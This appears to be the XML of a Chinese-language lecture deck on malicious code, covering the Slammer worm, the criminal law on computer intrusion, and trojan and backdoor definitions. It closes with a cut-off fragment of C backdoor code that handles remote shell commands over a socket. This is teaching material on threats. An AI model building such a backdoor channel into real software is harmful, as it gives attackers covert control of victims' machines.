                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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912B43EF-8EB5-40A6-94D7-021B0041D740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220788" y="417513"/>
            <a:ext cx="7923212" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>蠕虫王（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>slammer）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>的传播速度</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111619" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534AC21F-C171-40DC-B4DB-B558864FB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2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3284" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59AB4735-2B1A-4A4D-AEE9-4E73A3CC9B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53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420C6936-DD79-4B29-B9A6-58234F4E82AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中华人民共和国刑法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD24BC9-782D-4323-A083-68B8CA1A6A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1773238"/>
            <a:ext cx="7620000" cy="5688012"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>刑法修正案（七）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0"/>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>第九条规定：在刑法第二百八十五条中增加两款作为第二款、第三款：“违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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3829B399-8630-488D-BE9A-61A6F3B93E5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>病毒和蠕虫的区别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113667" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B6D405-9BBB-40BB-AB22-4F81FD15B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788" y="1709738"/>
            <a:ext cx="8778875"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13668" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F58F53A0-3E1B-40B6-AEA3-C06FD4A9EA3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="56388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2400"/>
              <a:t>该表来自郑辉博士的学位论文</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1897EB01-5E70-4718-87FF-A1FC92E4537A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA782CF1-A8AD-440D-B30D-A7C045D98A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000"/>
              <a:t>木马：是指附着在应用程序中或者单独存在的一些恶意程序，可以实现对被植入了木马程序的目标计算机的控制，或者窃取感染木马程序的计算机上的数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600"/>
              <a:t>流行的远程控制型木马有冰河、网络神偷、广外女生、网络公牛、黑洞、上兴、彩虹桥、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600"/>
              <a:t>PCShare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600"/>
              <a:t>、灰鸽子等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马程序通常是目标用户被欺骗之后自己触发执行的。</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lide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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slide(fromBottom)">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E3D8F8B-631A-4603-A810-DFE4DEAFB5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪装代码示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BD8AD0-6660-4BE3-AFF0-6E34A48D496C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1981200"/>
            <a:ext cx="7808912" cy="5048200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>gtk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>gtk.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>GtkWidget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> *window = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>gtk_window_new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(GTK_WINDOW_TOPLEVEL);    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>gtk_window_set_icon_from_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(GTK_WINDOW(window), "icon.png", NULL);  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>gtk_widget_show_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(window);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>gtk_main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96349756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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE3AB535-2FCE-40B6-9739-C9702AAC3935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115715" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA0113F9-62D6-4DC9-AA85-FB1252122944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马根据其功能，常见的分类如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程控制型木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>密码发送型木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>键盘记录型木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>破坏型木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>型木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>型木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>远程控制型木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是当前最为主要的一种木马。</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E910C38A-0F6C-4992-AB3F-A6F2EB5CAF7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116739" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD163552-65E6-47C1-9B32-DC60D2CB912B}"/>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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="116740" name="Object 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FA9FFD8-943B-47EF-A012-6D43B2C88AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1714500" y="2714625"/>
          <a:ext cx="6408738" cy="3143250"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s116775" name="Visio" r:id="rId3" imgW="4270629" imgH="2092833" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="4270629" imgH="209283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2714625"/>
                        <a:ext cx="6408738"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3566CD-6A3E-402B-897B-BA2FF955F880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117763" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B0AA64-53B0-4E96-8CC1-F5E76C677055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117764" name="图片 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7C87BF3-E24C-4707-B375-9D4DD3C2F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0"/>
            <a:ext cx="9144000" cy="622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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A768C7FC-7FD2-4372-A677-7FC0C9C345B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C61E30-6A2D-4AE5-B1B6-73BE1929090C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>允许攻击者绕过系统中常规安全控制机制的程序，按照攻击者自己的意图提供通道。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>还有一种观点是，后门拥有与木马相同的功能，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后门通常是由攻击者入侵到目标计算机之后由攻击者植入的。</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BD8AD0-6660-4BE3-AFF0-6E34A48D496C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="0"/>
            <a:ext cx="7808912" cy="7029400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("q", buffer, 1) == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>closesocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(sock);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WSACleanup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>			exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>		else if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("cd ", buffer, 3) == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
